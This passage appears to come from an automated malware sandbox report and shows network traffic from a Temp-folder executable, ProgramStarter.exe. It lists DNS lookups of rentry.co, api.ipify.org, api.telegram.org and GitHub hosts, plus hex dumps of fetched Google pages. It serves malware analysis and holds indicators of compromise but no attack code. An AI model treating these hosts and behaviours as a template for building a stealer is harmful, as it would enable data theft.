                                                                                                                                                                                                                    Mar 19, 2023 00:19:02.557882071 CET44349695198.251.88.130192.168.2.3
                                                                                                                                                                                                                    Mar 19, 2023 00:19:02.558115005 CET49695443192.168.2.3198.251.88.130
                                                                                                                                                                                                                    Mar 19, 2023 00:19:21.701519012 CET49695443192.168.2.3198.251.88.130
                                                                                                                                                                                                                    Mar 19, 2023 00:19:21.701550961 CET44349695198.251.88.130192.168.2.3
                                                                                                                                                                                                                    Mar 19, 2023 00:19:21.755953074 CET49698443192.168.2.3198.251.88.130
                                                                                                                                                                                                                    Mar 19, 2023 00:19:21.756020069 CET44349698198.251.88.130192.168.2.3
                                                                                                                                                                                                                    Mar 19, 2023 00:19:21.756372929 CET49698443192.168.2.3198.251.88.130
                                                                                                                                                                                                                    Mar 19, 2023 00:19:21.756553888 CET49698443192.168.2.3198.251.88.130
                                                                                                                                                                                                                    Mar 19, 2023 00:19:21.756577015 CET44349698198.251.88.130192.168.2.3
                                                                                                                                                                                                                    Mar 19, 2023 00:19:21.848141909 CET44349698198.251.88.130192.168.2.3
                                                                                                                                                                                                                    Mar 19, 2023 00:19:21.850675106 CET49698443192.168.2.3198.251.88.130
                                                                                                                                                                                                                    Mar 19, 2023 00:19:21.850754023 CET44349698198.251.88.130192.168.2.3
                                                                                                                                                                                                                    Mar 19, 2023 00:19:21.935288906 CET44349698198.251.88.130192.168.2.3
                                                                                                                                                                                                                    Mar 19, 2023 00:19:21.935348034 CET44349698198.251.88.130192.168.2.3
                                                                                                                                                                                                                    Mar 19, 2023 00:19:21.935494900 CET49698443192.168.2.3198.251.88.130
                                                                                                                                                                                                                    Mar 19, 2023 00:19:21.935520887 CET44349698198.251.88.130192.168.2.3
                                                                                                                                                                                                                    Mar 19, 2023 00:19:21.940720081 CET49698443192.168.2.3198.251.88.130
                                                                                                                                                                                                                    Mar 19, 2023 00:19:21.941245079 CET49698443192.168.2.3198.251.88.130

                                                                                                                                                                                                                    UDP Packets

                                                                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                    Mar 19, 2023 00:17:10.358745098 CET5897453192.168.2.38.8.8.8
                                                                                                                                                                                                                    Mar 19, 2023 00:17:10.397644997 CET53589748.8.8.8192.168.2.3
                                                                                                                                                                                                                    Mar 19, 2023 00:17:12.141326904 CET6372253192.168.2.38.8.8.8
                                                                                                                                                                                                                    Mar 19, 2023 00:17:12.161010981 CET53637228.8.8.8192.168.2.3
                                                                                                                                                                                                                    Mar 19, 2023 00:17:12.825360060 CET6552253192.168.2.38.8.8.8
                                                                                                                                                                                                                    Mar 19, 2023 00:17:12.844556093 CET53655228.8.8.8192.168.2.3
                                                                                                                                                                                                                    Mar 19, 2023 00:17:12.863749981 CET5986953192.168.2.38.8.8.8
                                                                                                                                                                                                                    Mar 19, 2023 00:17:12.883479118 CET53598698.8.8.8192.168.2.3
                                                                                                                                                                                                                    Mar 19, 2023 00:17:13.983597040 CET5439753192.168.2.38.8.8.8
                                                                                                                                                                                                                    Mar 19, 2023 00:17:14.000703096 CET53543978.8.8.8192.168.2.3
                                                                                                                                                                                                                    Mar 19, 2023 00:17:21.492362022 CET5932453192.168.2.38.8.8.8
                                                                                                                                                                                                                    Mar 19, 2023 00:17:21.519740105 CET53593248.8.8.8192.168.2.3
                                                                                                                                                                                                                    Mar 19, 2023 00:17:21.815330982 CET5901453192.168.2.38.8.8.8
                                                                                                                                                                                                                    Mar 19, 2023 00:17:21.834188938 CET53590148.8.8.8192.168.2.3
                                                                                                                                                                                                                    Mar 19, 2023 00:17:51.195936918 CET6162653192.168.2.38.8.8.8
                                                                                                                                                                                                                    Mar 19, 2023 00:17:51.215842962 CET53616268.8.8.8192.168.2.3
                                                                                                                                                                                                                    Mar 19, 2023 00:17:51.850929976 CET6178753192.168.2.38.8.8.8
                                                                                                                                                                                                                    Mar 19, 2023 00:17:51.870831966 CET53617878.8.8.8192.168.2.3
                                                                                                                                                                                                                    Mar 19, 2023 00:17:59.379724979 CET5892153192.168.2.38.8.8.8
                                                                                                                                                                                                                    Mar 19, 2023 00:17:59.399435043 CET53589218.8.8.8192.168.2.3

                                                                                                                                                                                                                    DNS Queries

                                                                                                                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                    Mar 19, 2023 00:17:10.358745098 CET192.168.2.38.8.8.80xb62Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Mar 19, 2023 00:17:12.141326904 CET192.168.2.38.8.8.80x6fbcStandard query (0)rentry.coA (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Mar 19, 2023 00:17:12.825360060 CET192.168.2.38.8.8.80xdddcStandard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Mar 19, 2023 00:17:12.863749981 CET192.168.2.38.8.8.80x21f9Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Mar 19, 2023 00:17:13.983597040 CET192.168.2.38.8.8.80x5ee0Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Mar 19, 2023 00:17:21.492362022 CET192.168.2.38.8.8.80x4366Standard query (0)github.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Mar 19, 2023 00:17:21.815330982 CET192.168.2.38.8.8.80x921eStandard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Mar 19, 2023 00:17:51.195936918 CET192.168.2.38.8.8.80x2aabStandard query (0)rentry.coA (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Mar 19, 2023 00:17:51.850929976 CET192.168.2.38.8.8.80x599aStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Mar 19, 2023 00:17:59.379724979 CET192.168.2.38.8.8.80xa230Standard query (0)rentry.coA (IP address)IN (0x0001)false

                                                                                                                                                                                                                    DNS Answers

                                                                                                                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                    Mar 19, 2023 00:17:10.397644997 CET8.8.8.8192.168.2.30xb62No error (0)www.google.com142.251.209.36A (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Mar 19, 2023 00:17:12.161010981 CET8.8.8.8192.168.2.30x6fbcNo error (0)rentry.co198.251.88.130A (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Mar 19, 2023 00:17:12.844556093 CET8.8.8.8192.168.2.30xdddcNo error (0)api.ipify.orgapi4.ipify.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                    Mar 19, 2023 00:17:12.844556093 CET8.8.8.8192.168.2.30xdddcNo error (0)api4.ipify.org104.237.62.211A (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Mar 19, 2023 00:17:12.844556093 CET8.8.8.8192.168.2.30xdddcNo error (0)api4.ipify.org173.231.16.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Mar 19, 2023 00:17:12.844556093 CET8.8.8.8192.168.2.30xdddcNo error (0)api4.ipify.org64.185.227.155A (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Mar 19, 2023 00:17:12.883479118 CET8.8.8.8192.168.2.30x21f9No error (0)api.ipify.orgapi4.ipify.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                    Mar 19, 2023 00:17:12.883479118 CET8.8.8.8192.168.2.30x21f9No error (0)api4.ipify.org64.185.227.155A (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Mar 19, 2023 00:17:12.883479118 CET8.8.8.8192.168.2.30x21f9No error (0)api4.ipify.org104.237.62.211A (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Mar 19, 2023 00:17:12.883479118 CET8.8.8.8192.168.2.30x21f9No error (0)api4.ipify.org173.231.16.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Mar 19, 2023 00:17:14.000703096 CET8.8.8.8192.168.2.30x5ee0No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Mar 19, 2023 00:17:21.519740105 CET8.8.8.8192.168.2.30x4366No error (0)github.com140.82.121.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Mar 19, 2023 00:17:21.834188938 CET8.8.8.8192.168.2.30x921eNo error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Mar 19, 2023 00:17:21.834188938 CET8.8.8.8192.168.2.30x921eNo error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Mar 19, 2023 00:17:21.834188938 CET8.8.8.8192.168.2.30x921eNo error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Mar 19, 2023 00:17:21.834188938 CET8.8.8.8192.168.2.30x921eNo error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Mar 19, 2023 00:17:51.215842962 CET8.8.8.8192.168.2.30x2aabNo error (0)rentry.co198.251.88.130A (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Mar 19, 2023 00:17:51.870831966 CET8.8.8.8192.168.2.30x599aNo error (0)www.google.com142.251.209.36A (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Mar 19, 2023 00:17:59.399435043 CET8.8.8.8192.168.2.30xa230No error (0)rentry.co198.251.88.130A (IP address)IN (0x0001)false

                                                                                                                                                                                                                    HTTP Request Dependency Graph

                                                                                                                                                                                                                    • rentry.co
                                                                                                                                                                                                                    • api.ipify.org
                                                                                                                                                                                                                    • api.telegram.org
                                                                                                                                                                                                                    • github.com
                                                                                                                                                                                                                    • raw.githubusercontent.com
                                                                                                                                                                                                                    • www.google.com

                                                                                                                                                                                                                    HTTP Packets

                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                    0192.168.2.349685198.251.88.130443C:\Users\user\AppData\Local\Temp\ProgramStarter.exe
                                                                                                                                                                                                                    TimestampkBytes transferredDirectionData


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                    1192.168.2.349686104.237.62.211443C:\Users\user\AppData\Local\Temp\ProgramStarter.exe
                                                                                                                                                                                                                    TimestampkBytes transferredDirectionData


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                    10192.168.2.349684142.251.209.3680C:\Users\user\AppData\Local\Temp\ProgramStarter.exe
                                                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                    Mar 19, 2023 00:17:10.440994024 CET101OUTGET / HTTP/1.1
                                                                                                                                                                                                                    Host: www.google.com
                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                    Mar 19, 2023 00:17:10.521131992 CET103INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Date: Sat, 18 Mar 2023 23:17:10 GMT
                                                                                                                                                                                                                    Expires: -1
                                                                                                                                                                                                                    Cache-Control: private, max-age=0
                                                                                                                                                                                                                    Content-Type: text/html; charset=ISO-8859-1
                                                                                                                                                                                                                    Server: gws
                                                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                    Set-Cookie: AEC=ARSKqsJ5tCOZAmEce_Ik_DEanBeLSvSBwkmxVz6Hl3zsjx7dhy0jgAZ3xw; expires=Thu, 14-Sep-2023 23:17:10 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
                                                                                                                                                                                                                    Accept-Ranges: none
                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                    Data Raw: 35 37 61 66 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 69 74 65 6d 73 63 6f 70 65 3d 22 22 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 57 65 62 50 61 67 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 47 42 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 67 2f 31 78 2f 67 6f 6f 67 6c 65 67 5f 73 74 61 6e 64 61 72 64 5f 63 6f 6c 6f 72 5f 31 32 38 64 70 2e 70 6e 67 22 20 69 74 65 6d 70 72 6f 70 3d 22 69 6d 61 67 65 22 3e 3c 74 69 74 6c 65 3e 47 6f 6f 67 6c 65 3c 2f 74 69 74 6c 65 3e 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 36 72 37 58 44 4e 2d 46 55 71 32 76 34 31 67 37 38 7a 46 6f 2d 67 22 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 67 6f 6f 67 6c 65 3d 7b 6b 45 49 3a 27 64 6b 59 57 5a 50 71 42 48 49 5f 57 6b 77 57 4c 7a 37 46 67 27 2c 6b 45 58 50 49 3a 27 30 2c 31 33 35 39 34 30 39 2c 36 30 35 39 2c 32 30 36 2c 34 38 30 34 2c 32 33 31 36 2c 33 38 33 2c 32 34 36 2c 35 2c 31 31 32 39 31 32 30 2c 31 36 32 34 2c 31 35 37 36 38 36 36 2c 31 36 31 31 35 2c 32 38 36 38 34 2c 32 32 34 33 30 2c 31 33 36 32 2c 31 32 33 31 37 2c 31 37 35 38 32 2c 34 39 39 38 2c 31 33 32 32 38 2c 33 38 34 37 2c 33 38 34 34 34 2c 32 38 37 32 2c 32 38 39 31 2c 34 31 34 30 2c 37 36 31 34 2c 36 30 36 2c 32 39 38 37 37 2c 32 34 32 36 37 2c 36 35 34 36 2c 32 36 31 34 2c 31 33 31 34 32 2c 33 2c 33 34 36 2c 32 33 30 2c 31 30 31 34 2c 31 2c 35 34 34 35 2c 31 31 34 37 31 2c 32 36 35 32 2c 34 2c 31 35 32 38 2c 32 33 30 34 2c 34 32 31 32 37 2c 31 38 30 39 35 2c 39 33 35 38 2c 37 34 32 38 2c 35 38 30 30 2c 32 35 35 37 2c 34 30 39 34 2c 37 35 39 36 2c 31 2c 31 31 39 34 32 2c 33 30 32 31 38 2c 32 2c 31 34 30 31 36 2c 32 37 31 35 2c 32 33 30 32 34 2c 36 36 39 39 2c 33 31 31 32 33 2c 34 35 36 38 2c 36 32 35 35 2c 32 33 34 32 32 2c 31 32 35 31 2c 35 38 33 35 2c 31 34 39 36 37 2c 34 33 33 33 2c 35 30 31 36 2c 32 34 36 38 2c 32 35 30 37 36 2c 32 30 30 36 2c 38 31 35 35 2c 36 36 38 32 2c 36 39 39 2c 32 2c 31 33 39 39 2c 31 34 35 36 38 2c 38 37 34 2c 31 39 36 33 33 2c 39 2c 31 39 32 30 2c 35 37 38 34 2c 33 39 39 35 2c 31 32 34 31 34 2c 36 37 31 36 2c 32 2c 32 32 35 39 2c 31 34 37 36 33 2c 32 35 32 34 2c 33 37 38 31 2c 32 30 31
                                                                                                                                                                                                                    Data Ascii: 57af<!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="en-GB"><head><meta content="text/html; charset=UTF-8" http-equiv="Content-Type"><meta content="/images/branding/googleg/1x/googleg_standard_color_128dp.png" itemprop="image"><title>Google</title><script nonce="6r7XDN-FUq2v41g78zFo-g">(function(){window.google={kEI:'dkYWZPqBHI_WkwWLz7Fg',kEXPI:'0,1359409,6059,206,4804,2316,383,246,5,1129120,1624,1576866,16115,28684,22430,1362,12317,17582,4998,13228,3847,38444,2872,2891,4140,7614,606,29877,24267,6546,2614,13142,3,346,230,1014,1,5445,11471,2652,4,1528,2304,42127,18095,9358,7428,5800,2557,4094,7596,1,11942,30218,2,14016,2715,23024,6699,31123,4568,6255,23422,1251,5835,14967,4333,5016,2468,25076,2006,8155,6682,699,2,1399,14568,874,19633,9,1920,5784,3995,12414,6716,2,2259,14763,2524,3781,201
                                                                                                                                                                                                                    Mar 19, 2023 00:17:10.521212101 CET104INData Raw: 39 39 2c 36 30 34 39 2c 39 35 35 36 2c 32 30 31 33 2c 32 36 31 34 2c 31 31 32 35 39 2c 38 39 34 37 2c 31 36 32 32 2c 31 37 37 38 2c 34 39 37 37 2c 33 39 34 31 2c 34 34 33 36 2c 36 35 31 34 2c 34 30 39 37 2c 34 33 38 37 2c 39 38 38 2c 32 32 36 35
                                                                                                                                                                                                                    Data Ascii: 99,6049,9556,2013,2614,11259,8947,1622,1778,4977,3941,4436,6514,4097,4387,988,2265,765,427,846,4838,1410,890,160,7245,1296,508,7553,181,495,442,710,1091,1648,109,1128,9480,3544,453,933,4741,589,536,1361,566,2,417,735,78,1473,1278,1,1173,1581,6
                                                                                                                                                                                                                    Mar 19, 2023 00:17:10.521285057 CET105INData Raw: 63 74 3d 22 2b 61 2b 22 26 63 61 64 3d 22 2b 62 2b 65 2b 22 26 7a 78 3d 22 2b 44 61 74 65 2e 6e 6f 77 28 29 2b 64 3b 2f 5e 68 74 74 70 3a 2f 69 2e 74 65 73 74 28 63 29 26 26 22 68 74 74 70 73 3a 22 3d 3d 3d 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69
                                                                                                                                                                                                                    Data Ascii: ct="+a+"&cad="+b+e+"&zx="+Date.now()+d;/^http:/i.test(c)&&"https:"===window.location.protocol&&(google.ml&&google.ml(Error("a"),!1,{src:c,glmm:1}),c="");return c};h=google.kEI;google.getEI=l;google.getLEI=m;google.ml=function(){return null};go
                                                                                                                                                                                                                    Mar 19, 2023 00:17:10.521346092 CET107INData Raw: 2d 6e 6f 68 72 65 66 22 29 3b 62 72 65 61 6b 20 61 7d 61 3d 21 31 7d 61 26 26 62 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 7d 2c 21 30 29 3b 7d 29 2e 63 61 6c 6c 28 74 68 69 73 29 3b 3c 2f 73 63 72 69 70 74 3e 3c 73 74 79 6c 65 3e 23 67
                                                                                                                                                                                                                    Data Ascii: -nohref");break a}a=!1}a&&b.preventDefault()},!0);}).call(this);</script><style>#gb{font:13px/27px Arial,sans-serif;height:30px}#gbz,#gbg{position:absolute;white-space:nowrap;top:0;height:30px;z-index:1000}#gbz{left:0;padding-left:4px}#gbg{rig
                                                                                                                                                                                                                    Mar 19, 2023 00:17:10.521408081 CET108INData Raw: 73 69 62 69 6c 69 74 79 3a 76 69 73 69 62 6c 65 7d 23 67 62 7a 20 2e 67 62 6d 7b 6c 65 66 74 3a 30 7d 23 67 62 67 20 2e 67 62 6d 7b 72 69 67 68 74 3a 30 7d 2e 67 62 78 6d 73 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 63 63 63 3b 64
                                                                                                                                                                                                                    Data Ascii: sibility:visible}#gbz .gbm{left:0}#gbg .gbm{right:0}.gbxms{background-color:#ccc;display:block;position:absolute;z-index:1;top:-1px;left:-2px;right:-2px;bottom:-2px;opacity:.4;-moz-border-radius:3px;filter:progid:DXImageTransform.Microsoft.Blu
                                                                                                                                                                                                                    Mar 19, 2023 00:17:10.521469116 CET110INData Raw: 3b 62 6f 72 64 65 72 2d 72 69 67 68 74 3a 31 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 2a 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 70 61 64 64 69 6e 67 3a 30 20
                                                                                                                                                                                                                    Data Ascii: ;border-right:1px solid transparent;display:block;*display:inline-block;padding:0 5px;position:relative;z-index:1000}.gbts{*display:inline}.gbzt .gbts{display:inline;zoom:1}.gbto .gbts{background:#fff;border-color:#bebebe;color:#36c;padding-bo
                                                                                                                                                                                                                    Mar 19, 2023 00:17:10.521528959 CET111INData Raw: 6e 67 3a 32 37 70 78 20 35 70 78 20 31 70 78 7d 23 67 62 69 34 69 2c 23 67 62 69 34 69 64 7b 6c 65 66 74 3a 35 70 78 3b 62 6f 72 64 65 72 3a 30 3b 68 65 69 67 68 74 3a 32 34 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70
                                                                                                                                                                                                                    Data Ascii: ng:27px 5px 1px}#gbi4i,#gbi4id{left:5px;border:0;height:24px;position:absolute;top:1px;width:24px}.gbto #gbi4i,.gbto #gbi4id{top:3px}.gbi4p{display:block;width:24px}#gbi4id{background-position:-44px -101px}#gbmpid{background-position:0 0}#gbmp
                                                                                                                                                                                                                    Mar 19, 2023 00:17:10.521588087 CET112INData Raw: 69 6e 65 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 7d 23 67 62 70 6d 20 2e 67 62 6d 6c 31 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 6d 61 72 67 69 6e 3a 30
                                                                                                                                                                                                                    Data Ascii: ine:none;text-decoration:underline !important}#gbpm .gbml1{display:inline;margin:0;padding:0;white-space:nowrap}.gbmlb,.gbmlb:visited{line-height:27px}.gbmlb-hvr,.gbmlb:focus{outline:none;text-decoration:underline !important}.gbmlbw{color:#ccc
                                                                                                                                                                                                                    Mar 19, 2023 00:17:10.521647930 CET114INData Raw: 67 62 64 34 20 2e 67 62 70 63 7b 2a 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 7d 2e 67 62 70 63 20 2e 67 62 70 73 2c 2e 67 62 70 63 20 2e 67 62 70 73 32 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 30 20 32 30 70 78 7d 23 67
                                                                                                                                                                                                                    Data Ascii: gbd4 .gbpc{*display:inline}.gbpc .gbps,.gbpc .gbps2{display:block;margin:0 20px}#gbmplp.gbps{margin:0 10px}.gbpc .gbps{color:#000;font-weight:bold}.gbpc .gbpd{margin-bottom:5px}.gbpd .gbmt,.gbpd .gbps{color:#666 !important}.gbpd .gbmt{opacity:
                                                                                                                                                                                                                    Mar 19, 2023 00:17:10.521711111 CET115INData Raw: 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 74 6f 70 7d 0a 2e 67 62 71 66 62 2c 2e 67 62 71 66 62 61 2c 2e 67 62 71 66
                                                                                                                                                                                                                    Data Ascii: ay:inline-block;height:auto;margin:10px 0;vertical-align:top}.gbqfb,.gbqfba,.gbqfbb{-moz-border-radius:2px;-webkit-border-radius:2px;border-radius:2px;cursor:default !important;display:inline-block;font-weight:bold;height:29px;line-height:29p
                                                                                                                                                                                                                    Mar 19, 2023 00:17:10.543534994 CET116INData Raw: 2c 2e 31 29 3b 63 6f 6c 6f 72 3a 23 34 34 34 20 21 69 6d 70 6f 72 74 61 6e 74 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 31 70 78 7d 2e 67 62 71 66 62 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 64 39 30 66 65 3b 62 61 63 6b 67 72 6f 75
                                                                                                                                                                                                                    Data Ascii: ,.1);color:#444 !important;font-size:11px}.gbqfb{background-color:#4d90fe;background-image:-webkit-gradient(linear,left top,left bottom,from(#4d90fe),to(#4787ed));background-image:-webkit-linear-gradient(top,#4d90fe,#4787ed);background-image:-


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                    11192.168.2.349693142.251.209.3680C:\Users\user\AppData\Local\Temp\ProgramStarter.exe
                                                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                    Mar 19, 2023 00:17:51.963802099 CET8439OUTGET / HTTP/1.1
                                                                                                                                                                                                                    Host: www.google.com
                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                    Mar 19, 2023 00:17:52.040275097 CET8441INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Date: Sat, 18 Mar 2023 23:17:52 GMT
                                                                                                                                                                                                                    Expires: -1
                                                                                                                                                                                                                    Cache-Control: private, max-age=0
                                                                                                                                                                                                                    Content-Type: text/html; charset=ISO-8859-1
                                                                                                                                                                                                                    Server: gws
                                                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                    Set-Cookie: AEC=ARSKqsIxAxROBxoE2_jlIVT79xxUVFHIgns-VqrY069hKWrmNwD1uxqwhio; expires=Thu, 14-Sep-2023 23:17:52 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
                                                                                                                                                                                                                    Accept-Ranges: none
                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                    Data Raw: 35 35 66 62 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 69 74 65 6d 73 63 6f 70 65 3d 22 22 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 57 65 62 50 61 67 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 47 42 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 67 2f 31 78 2f 67 6f 6f 67 6c 65 67 5f 73 74 61 6e 64 61 72 64 5f 63 6f 6c 6f 72 5f 31 32 38 64 70 2e 70 6e 67 22 20 69 74 65 6d 70 72 6f 70 3d 22 69 6d 61 67 65 22 3e 3c 74 69 74 6c 65 3e 47 6f 6f 67 6c 65 3c 2f 74 69 74 6c 65 3e 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 59 41 4a 54 68 32 4b 75 54 4d 4f 5f 36 6b 4f 34 70 51 34 33 32 67 22 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 67 6f 6f 67 6c 65 3d 7b 6b 45 49 3a 27 6e 30 59 57 5a 4e 44 31 4f 39 62 32 73 41 66 41 34 61 66 59 44 77 27 2c 6b 45 58 50 49 3a 27 30 2c 31 38 31 36 37 2c 31 33 34 31 32 34 32 2c 36 30 35 38 2c 32 30 37 2c 34 38 30 34 2c 32 33 31 36 2c 33 38 33 2c 32 34 36 2c 35 2c 31 31 32 39 31 32 30 2c 31 35 30 30 39 36 32 2c 37 37 35 32 39 2c 31 36 31 31 31 2c 32 38 36 38 37 2c 32 32 34 33 30 2c 31 33 36 32 2c 31 32 33 31 39 2c 31 37 35 38 30 2c 34 39 39 38 2c 31 33 32 32 38 2c 33 38 34 37 2c 33 38 34 34 34 2c 32 38 37 32 2c 32 38 39 31 2c 34 31 33 39 2c 37 36 31 35 2c 36 30 36 2c 35 34 31 34 34 2c 36 35 34 36 2c 32 36 31 34 2c 31 33 31 34 32 2c 33 2c 33 34 36 2c 32 33 30 2c 31 30 31 34 2c 31 2c 35 34 34 34 2c 31 31 34 37 32 2c 32 36 35 32 2c 34 2c 31 35 32 38 2c 32 33 30 34 2c 34 32 31 32 35 2c 31 33 36 36 30 2c 34 34 33 37 2c 39 33 35 38 2c 37 34 32 38 2c 35 37 39 31 2c 32 35 36 36 2c 34 30 39 34 2c 37 35 39 36 2c 31 2c 34 32 31 35 34 2c 32 2c 31 34 30 32 32 2c 32 37 31 35 2c 32 31 32 36 36 2c 31 37 35 38 2c 35 36 37 39 2c 31 30 32 31 2c 33 31 31 32 31 2c 34 35 36 38 2c 36 32 35 39 2c 32 33 34 31 38 2c 31 32 34 36 2c 35 38 34 31 2c 31 34 39 36 38 2c 34 33 33 32 2c 37 34 38 34 2c 32 37 30 38 32 2c 38 31 35 35 2c 36 36 38 32 2c 36 39 39 2c 32 2c 31 34 37 38 2c 31 34 34 38 39 2c 38 37 34 2c 31 39 36 33 34 2c 36 2c 31 39 32 32 2c 35 36 30 34 2c 31 38 30 2c 33 39 39 35 2c 38 32 31 33 2c 34 32 30 31 2c 38 39 37 36 2c 33 38 39 2c 32 2c 31 39 31 32 2c 31 32 34 36
